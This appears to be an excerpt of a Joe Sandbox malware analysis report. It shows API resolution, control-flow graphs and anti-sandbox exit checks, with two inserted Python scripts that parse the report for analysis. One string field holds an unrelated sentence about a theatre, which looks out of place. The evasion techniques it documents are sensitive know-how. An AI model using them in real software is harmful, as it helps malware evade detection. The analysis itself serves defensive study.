27717->27719 27718->27719 27720 3c3ecd lstrcpy 27719->27720 27721 3c3ed5 GetSystemTime 27719->27721 27720->27721 27722 3c3ef3 27721->27722 27722->27518 27725 3c732d 27723->27725 27724 3a519b 27727 3c7280 27724->27727 27725->27724 27726 3c733d lstrcpy lstrcat 27725->27726 27726->27724 27728 3c728c 
27727->27728 27729 3c72b4 27728->27729 27730 3c72ac lstrcpy 27728->27730 27729->27574 27730->27729 27733 3c72dc 27731->27733 27732 3a51b7 27732->27577 27733->27732 27734 3c72ed lstrcpy lstrcat 27733->27734 27734->27732 27739 3b4c77 295 API calls 27760 3c31f0 GetSystemInfo wsprintfA 27764 3b1269 408 API calls 27741 3a5869 57 API calls 27756 3c2d60 11 API calls 27777 3c2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27778 3ca280 __CxxFrameHandler 27757 3b3959 244 API calls 27761 3b01d9 126 API calls 27752 3c2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27742 3c2853 lstrcpy 27786 3b8615 48 API calls 27743 3be049 147 API calls 27753 3c3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27779 3b8615 49 API calls 27787 3c33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A4C7F
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A4CD2
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A4D05
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A4D35
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A4D73
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A4DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003A4DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 348d8c1493168e1c4f51e72769467092ad1018e7c354a34eab37ed26d78a3253
                          • Instruction ID: 16695877e6bb6f95b6b2f931776fd45c03b094806ee6f19b5bc59804ebce75ad
                          • Opcode Fuzzy Hash: 348d8c1493168e1c4f51e72769467092ad1018e7c354a34eab37ed26d78a3253
                          • Instruction Fuzzy Hash: 25526E329112169BCB22EFA4DC49BAFB7B9EF45300F15442AF805EB251DB74ED46CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2125 3c6390-3c63bd GetPEB 2126 3c65c3-3c6623 LoadLibraryA * 5 2125->2126 2127 3c63c3-3c65be call 3c62f0 GetProcAddress * 20 2125->2127 2128 3c6638-3c663f 2126->2128 2129 3c6625-3c6633 GetProcAddress 2126->2129 2127->2126 2131 3c666c-3c6673 2128->2131 2132 3c6641-3c6667 GetProcAddress * 2 2128->2132 2129->2128 2134 3c6688-3c668f 2131->2134 2135 3c6675-3c6683 GetProcAddress 2131->2135 2132->2131 2137 3c66a4-3c66ab 2134->2137 2138 3c6691-3c669f GetProcAddress 2134->2138 2135->2134 2139 3c66ad-3c66d2 GetProcAddress * 2 2137->2139 2140 3c66d7-3c66da 2137->2140 2138->2137 2139->2140
                          APIs
                          • GetProcAddress.KERNEL32(77190000,00F21508), ref: 003C63E9
                          • GetProcAddress.KERNEL32(77190000,00F21628), ref: 003C6402
                          • GetProcAddress.KERNEL32(77190000,00F21580), ref: 003C641A
                          • GetProcAddress.KERNEL32(77190000,00F215C8), ref: 003C6432
                          • GetProcAddress.KERNEL32(77190000,00F293D8), ref: 003C644B
                          • GetProcAddress.KERNEL32(77190000,00F166D8), ref: 003C6463
                          • GetProcAddress.KERNEL32(77190000,00F16858), ref: 003C647B
                          • GetProcAddress.KERNEL32(77190000,00F216B8), ref: 003C6494
                          • GetProcAddress.KERNEL32(77190000,00F216D0), ref: 003C64AC
                          • GetProcAddress.KERNEL32(77190000,00F216E8), ref: 003C64C4
                          • GetProcAddress.KERNEL32(77190000,00F21700), ref: 003C64DD
                          • GetProcAddress.KERNEL32(77190000,00F16698), ref: 003C64F5
                          • GetProcAddress.KERNEL32(77190000,00F215E0), ref: 003C650D
                          • GetProcAddress.KERNEL32(77190000,00F215F8), ref: 003C6526
                          • GetProcAddress.KERNEL32(77190000,00F16638), ref: 003C653E
                          • GetProcAddress.KERNEL32(77190000,00F21610), ref: 003C6556
                          • GetProcAddress.KERNEL32(77190000,00F21640), ref: 003C656F
                          • GetProcAddress.KERNEL32(77190000,00F16658), ref: 003C6587
                          • GetProcAddress.KERNEL32(77190000,00F21808), ref: 003C659F
                          • GetProcAddress.KERNEL32(77190000,00F16678), ref: 003C65B8
                          • LoadLibraryA.KERNEL32(00F217F0,?,?,?,003C1C03), ref: 003C65C9
                          • LoadLibraryA.KERNEL32(00F21850,?,?,?,003C1C03), ref: 003C65DB
                          • LoadLibraryA.KERNEL32(00F218B0,?,?,?,003C1C03), ref: 003C65ED
                          • LoadLibraryA.KERNEL32(00F21820,?,?,?,003C1C03), ref: 003C65FE
                          • LoadLibraryA.KERNEL32(00F21838,?,?,?,003C1C03), ref: 003C6610
                          • GetProcAddress.KERNEL32(76850000,00F21898), ref: 003C662D
                          • GetProcAddress.KERNEL32(77040000,00F21868), ref: 003C6649
                          • GetProcAddress.KERNEL32(77040000,00F21880), ref: 003C6661
                          • GetProcAddress.KERNEL32(75A10000,00F29550), ref: 003C667D
                          • GetProcAddress.KERNEL32(75690000,00F166F8), ref: 003C6699
                          • GetProcAddress.KERNEL32(776F0000,00F29468), ref: 003C66B5
                          • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 003C66CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 003C66C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: faeb61a51652a65a3a78e0810817f92b7d490f623b4338b8c6985e2e270e0378
                          • Instruction ID: 8047b7e1be3a63626930bdbcb9ac8619447712036502f5153e0bf06796b659b3
                          • Opcode Fuzzy Hash: faeb61a51652a65a3a78e0810817f92b7d490f623b4338b8c6985e2e270e0378
                          • Instruction Fuzzy Hash: 91A14CB5A13201AFD774DFA5FC4CA263BB9F7A8641300851BE956D3364DB34A808EB60
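                          The API list above shows 31 of the 32 resolved names only as pointers (00F1xxxx/00F2xxxx) and a single literal, NtQueryInformationProcess. The following Python script is an added example, not part of the Joe Sandbox report or of the sample: it parses report lines of this shape, groups the GetProcAddress calls by module handle and separates names that are readable in the dump from names the tool could only show as a pointer. The six input lines are copied from the list above. IMAGE_TOP is an assumption taken from the report's dump list (the highest dumped region starts at 00A31000; its size is not given), so the off-image count is a heuristic and is marked as such in the code.

```python
import re
from collections import Counter

# Six lines copied from the "APIs" list of function 003C6390 in this report
# (a subset of the 32 entries shown there).
REPORT_LINES = """\
• GetProcAddress.KERNEL32(77190000,00F21508), ref: 003C63E9
• GetProcAddress.KERNEL32(77190000,00F21628), ref: 003C6402
• LoadLibraryA.KERNEL32(00F217F0,?,?,?,003C1C03), ref: 003C65C9
• GetProcAddress.KERNEL32(76850000,00F21898), ref: 003C662D
• GetProcAddress.KERNEL32(776F0000,00F29468), ref: 003C66B5
• GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 003C66CC
"""

# Assumption: start of the highest image region the report dumps for this
# process (00A31000). Its size is not given, so "off image" is a heuristic.
IMAGE_TOP = 0x00A31000

LINE_RE = re.compile(
    r"(?:•\s*)?(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
PTR_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_api_lines(text):
    """Turn report 'APIs' lines into dicts: api name, raw argument list, call site."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            calls.append({"api": m["api"], "args": m["args"].split(","), "ref": int(m["ref"], 16)})
    return calls


def summarize_resolution(calls):
    """Group GetProcAddress calls by module handle and split the name argument
    into literal strings (visible in the dump) and pointers (string built at
    runtime, so the tool prints only its address)."""
    per_handle = Counter()
    literal, pointers = [], []
    loads = 0
    for c in calls:
        if c["api"] == "LoadLibraryA":
            loads += 1
        elif c["api"] == "GetProcAddress":
            handle, name = c["args"][0], c["args"][1]
            per_handle[handle] += 1
            if PTR_RE.match(name):
                pointers.append(int(name, 16))
            else:
                literal.append((handle, name, c["ref"]))
    # Heuristic: a name pointer above every dumped image region was not
    # materialised in the PE image but in memory allocated at runtime.
    off_image = sum(1 for p in pointers if p >= IMAGE_TOP)
    return {
        "per_handle": per_handle,
        "literal": literal,
        "pointer_names": len(pointers),
        "off_image": off_image,
        "loads": loads,
    }


if __name__ == "__main__":
    summary = summarize_resolution(parse_api_lines(REPORT_LINES))
    for handle, n in summary["per_handle"].most_common():
        print(f"handle {handle}: {n} GetProcAddress call(s)")
    print("literal names:", summary["literal"])
    print(f"pointer-only names: {summary['pointer_names']} ({summary['off_image']} off image)")
```

Run over the full 32-line list from the report, the same function reports 20 resolves against handle 77190000 before the first LoadLibraryA, which matches the GetPEB node at the start of the control-flow graph: that module was already loaded and its base was taken from the PEB rather than from LoadLibraryA.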

                          Control-flow Graph

                          • 2141 3c1bf0-3c1c0b call 3a2a90 call 3c6390 -> 2146, 2147
                          • 2146 3c1c0d -> 2149
                          • 2147 3c1c1a-3c1c27 call 3a2930 -> 2151, 2152
                          • 2149 3c1c10-3c1c18 -> 2147, 2149
                          • 2151 3c1c29-3c1c2f lstrcpy -> 2152
                          • 2152 3c1c35-3c1c63 -> 2156, 2157
                          • 2156 3c1c6d-3c1c7b GetSystemInfo -> 2158, 2159
                          • 2157 3c1c65-3c1c67 ExitProcess
                          • 2158 3c1c7d-3c1c7f ExitProcess
                          • 2159 3c1c85-3c1ca0 call 3a1030 call 3a10c0 GetUserDefaultLangID -> 2164, 2165
                          • 2164 3c1cb8-3c1cca call 3c2ad0 call 3c3e10 -> 2171, 2172
                          • 2165 3c1ca2-3c1ca9 -> 2164, 2166
                          • 2166 3c1cb0-3c1cb2 ExitProcess
                          • 2171 3c1ccc-3c1cde call 3c2a40 call 3c3e10 -> 2172, 2185
                          • 2172 3c1ce7-3c1d06 lstrlen call 3a2930 -> 2177, 2178
                          • 2177 3c1d08-3c1d0d -> 2178, 2180
                          • 2178 3c1d23-3c1d40 lstrlen call 3a2930 -> 2186, 2187
                          • 2180 3c1d0f-3c1d11 -> 2178, 2183
                          • 2183 3c1d13-3c1d1d lstrcpy lstrcat -> 2178
                          • 2185 3c1ce0-3c1ce1 ExitProcess
                          • 2186 3c1d5a-3c1d7b call 3c2ad0 lstrlen call 3a2930 -> 2193, 2194
                          • 2187 3c1d42-3c1d44 -> 2186, 2188
                          • 2188 3c1d46-3c1d54 lstrcpy lstrcat -> 2186
                          • 2193 3c1d7d-3c1d7f -> 2194, 2195
                          • 2194 3c1d9a-3c1db4 lstrlen call 3a2930 -> 2199, 2200
                          • 2195 3c1d81-3c1d85 -> 2194, 2197
                          • 2197 3c1d87-3c1d94 lstrcpy lstrcat -> 2194
                          • 2199 3c1dce-3c1deb call 3c2a40 lstrlen call 3a2930 -> 2206, 2207
                          • 2200 3c1db6-3c1db8 -> 2199, 2201
                          • 2201 3c1dba-3c1dc8 lstrcpy lstrcat -> 2199
                          • 2206 3c1ded-3c1def -> 2207, 2210
                          • 2207 3c1e0a-3c1e0f -> 2208, 2209
                          • 2208 3c1e16-3c1e22 call 3a2930 -> 2215, 2216
                          • 2209 3c1e11 call 3a2a20 -> 2208
                          • 2210 3c1df1-3c1df5 -> 2207, 2213
                          • 2213 3c1df7-3c1e04 lstrcpy lstrcat -> 2207
                          • 2215 3c1e24-3c1e26 -> 2216, 2217
                          • 2216 3c1e30-3c1e66 call 3a2a20 * 5 OpenEventA -> 2228, 2229
                          • 2217 3c1e28-3c1e2a lstrcpy -> 2216
                          • 2228 3c1e8c-3c1ea0 CreateEventA call 3c1b20 call 3bffd0 -> 2233
                          • 2229 3c1e68-3c1e8a CloseHandle Sleep OpenEventA -> 2228, 2229
                          • 2233 3c1ea5-3c1eae CloseHandle ExitProcess
                          APIs
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F21508), ref: 003C63E9
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F21628), ref: 003C6402
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F21580), ref: 003C641A
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F215C8), ref: 003C6432
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F293D8), ref: 003C644B
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F166D8), ref: 003C6463
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F16858), ref: 003C647B
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F216B8), ref: 003C6494
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F216D0), ref: 003C64AC
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F216E8), ref: 003C64C4
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F21700), ref: 003C64DD
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F16698), ref: 003C64F5
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F215E0), ref: 003C650D
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C1C2F
                          • ExitProcess.KERNEL32 ref: 003C1C67
                          • GetSystemInfo.KERNEL32(?), ref: 003C1C71
                          • ExitProcess.KERNEL32 ref: 003C1C7F
                            • Part of subcall function 003A1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003A1046
                            • Part of subcall function 003A1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 003A104D
                            • Part of subcall function 003A1030: ExitProcess.KERNEL32 ref: 003A1058
                            • Part of subcall function 003A10C0: GlobalMemoryStatusEx.KERNEL32 ref: 003A10EA
                            • Part of subcall function 003A10C0: ExitProcess.KERNEL32 ref: 003A1114
                          • GetUserDefaultLangID.KERNEL32 ref: 003C1C8F
                          • ExitProcess.KERNEL32 ref: 003C1CB2
                          • ExitProcess.KERNEL32 ref: 003C1CE1
                          • lstrlen.KERNEL32(00F29338), ref: 003C1CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C1D15
                          • lstrcat.KERNEL32(00000000,00F29338), ref: 003C1D1D
                          • lstrlen.KERNEL32(003D4B98), ref: 003C1D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1D48
                          • lstrcat.KERNEL32(00000000,003D4B98), ref: 003C1D54
                          • lstrlen.KERNEL32(00000000), ref: 003C1D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1D94
                          • lstrlen.KERNEL32(003D4B98), ref: 003C1D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1DBC
                          • lstrcat.KERNEL32(00000000,003D4B98), ref: 003C1DC8
                          • lstrlen.KERNEL32(00000000), ref: 003C1DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: f158c21188a0a53de87a8f00bee77314500a5b9ad66989579f6f4d1d0dee9489
                          • Instruction ID: 602e34571221f885ef18be9025d903fcbacdd427a83a3630e08f2195b9307993
                          • Opcode Fuzzy Hash: f158c21188a0a53de87a8f00bee77314500a5b9ad66989579f6f4d1d0dee9489
                          • Instruction Fuzzy Hash: F2714031502216ABD732ABB4EC4DF6F7779AF66701F05401AF906DA2A2DF709C05EB60
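                          The control-flow graph of function 003C1BF0 above contains five blocks that call ExitProcess, four of them before the OpenEventA/CreateEventA singleton check. Which test gates each exit is what an analyst wants from this graph, so the following Python script, an added example that is not part of the Joe Sandbox report or of the sample, parses the report's flattened control_flow_graph text into nodes and edges and, for every ExitProcess block, walks backwards through API-less blocks to the nearest block that does call an API. The input is a verbatim excerpt of this function's graph, cut after edge 2171->2185 to keep the block short; the token pattern assumes six-hex-digit block addresses, as used throughout this report.

```python
import re
from collections import defaultdict

# Excerpt of the flattened control_flow_graph text for function 003C1BF0 in
# this report (copied verbatim, truncated after edge 2171->2185).
CFG_EXCERPT = (
    "2141 3c1bf0-3c1c0b call 3a2a90 call 3c6390 2146 3c1c0d 2141->2146 "
    "2147 3c1c1a-3c1c27 call 3a2930 2141->2147 2149 3c1c10-3c1c18 2146->2149 "
    "2151 3c1c29-3c1c2f lstrcpy 2147->2151 2152 3c1c35-3c1c63 2147->2152 "
    "2149->2147 2149->2149 2151->2152 2156 3c1c6d-3c1c7b GetSystemInfo "
    "2152->2156 2157 3c1c65-3c1c67 ExitProcess 2152->2157 "
    "2158 3c1c7d-3c1c7f ExitProcess 2156->2158 "
    "2159 3c1c85-3c1ca0 call 3a1030 call 3a10c0 GetUserDefaultLangID 2156->2159 "
    "2164 3c1cb8-3c1cca call 3c2ad0 call 3c3e10 2159->2164 "
    "2165 3c1ca2-3c1ca9 2159->2165 "
    "2171 3c1ccc-3c1cde call 3c2a40 call 3c3e10 2164->2171 "
    "2172 3c1ce7-3c1d06 lstrlen call 3a2930 2164->2172 2165->2164 "
    "2166 3c1cb0-3c1cb2 ExitProcess 2165->2166 2171->2172 "
    "2185 3c1ce0-3c1ce1 ExitProcess 2171->2185"
)

# Assumption: block addresses are six hex digits (true for every graph in
# this report), which keeps "* 20 2125->2126" from being read as a node.
TOKEN_RE = re.compile(
    r"(?P<edge>\d+->\d+)"                                # 2141->2146
    r"|(?P<node>\b\d+ [0-9a-f]{6}(?:-[0-9a-f]{6})?)\b"   # 2141 3c1bf0-3c1c0b
    r"|(?P<tok>\S+)"                                     # label words
)


def parse_cfg(text):
    """Return ({node_id: (addr_range, label)}, [(src, dst), ...])."""
    nodes, edges, current = {}, [], None
    for m in TOKEN_RE.finditer(text):
        if m.group("edge"):
            src, dst = m.group("edge").split("->")
            edges.append((int(src), int(dst)))
        elif m.group("node"):
            nid, addr = m.group("node").split(" ")
            current = int(nid)
            nodes[current] = [addr, []]
        elif current is not None:          # label word of the current node
            nodes[current][1].append(m.group("tok"))
    return {k: (addr, " ".join(words)) for k, (addr, words) in nodes.items()}, edges


def nearest_api_predecessors(text):
    """For each block calling ExitProcess, collect the nearest predecessor
    blocks that call an API (walking back through label-less blocks).
    Those blocks hold the check whose failure leads to the early exit."""
    nodes, edges = parse_cfg(text)
    preds = defaultdict(set)
    for src, dst in edges:
        preds[dst].add(src)
    gates = {}
    for nid, (addr, label) in nodes.items():
        if "ExitProcess" not in label.split():
            continue
        found, seen, stack = set(), {nid}, list(preds[nid])
        while stack:
            p = stack.pop()
            if p in seen or p not in nodes:   # loops, or node cut off by the excerpt
                continue
            seen.add(p)
            paddr, plabel = nodes[p]
            if plabel:
                found.add((paddr, plabel))
            else:
                stack.extend(preds[p])
        gates[addr] = sorted(found)
    return gates


if __name__ == "__main__":
    for exit_block, checks in sorted(nearest_api_predecessors(CFG_EXCERPT).items()):
        print(exit_block, "ExitProcess <-", "; ".join(f"{a} {l}" for a, l in checks))
```

On the excerpt the script attributes the exit at 3c1c7d to the GetSystemInfo block, the exit at 3c1cb0 to the block that calls 3A1030 (VirtualAllocExNuma), 3A10C0 (GlobalMemoryStatusEx) and GetUserDefaultLangID, and the exit at 3c1ce0 to the block calling 3C2A40 (GetUserNameA) and 3C3E10, the sequence the report's signature list summarises as an evasive API chain that may stop execution after checking the locale. Which thresholds those checks compare against is not in the report; the script only recovers the structure.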

                          Control-flow Graph

                          • 2850 3a4a60-3a4afc RtlAllocateHeap -> 2867, 2868
                          • 2867 3a4b7a-3a4bbe VirtualProtect
                          • 2868 3a4afe-3a4b03 -> 2869
                          • 2869 3a4b06-3a4b78 -> 2867
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A4AA3
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 003A4BB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: e24b6d1e670a8080c64ecefebb790f25cc03ca99f28539811419a6ff003e7335
                          • Instruction ID: 15e2f5ee5f47226ce7b05c1afecdad1e86d5764ade5de11796763814d0ea7487
                          • Opcode Fuzzy Hash: e24b6d1e670a8080c64ecefebb790f25cc03ca99f28539811419a6ff003e7335
                          • Instruction Fuzzy Hash: 0931091AB8121C779622EBEF6C67F9F6E55DFC5750B010073F5A857380CBB15400CAA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003C2A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C2A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 003C2A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
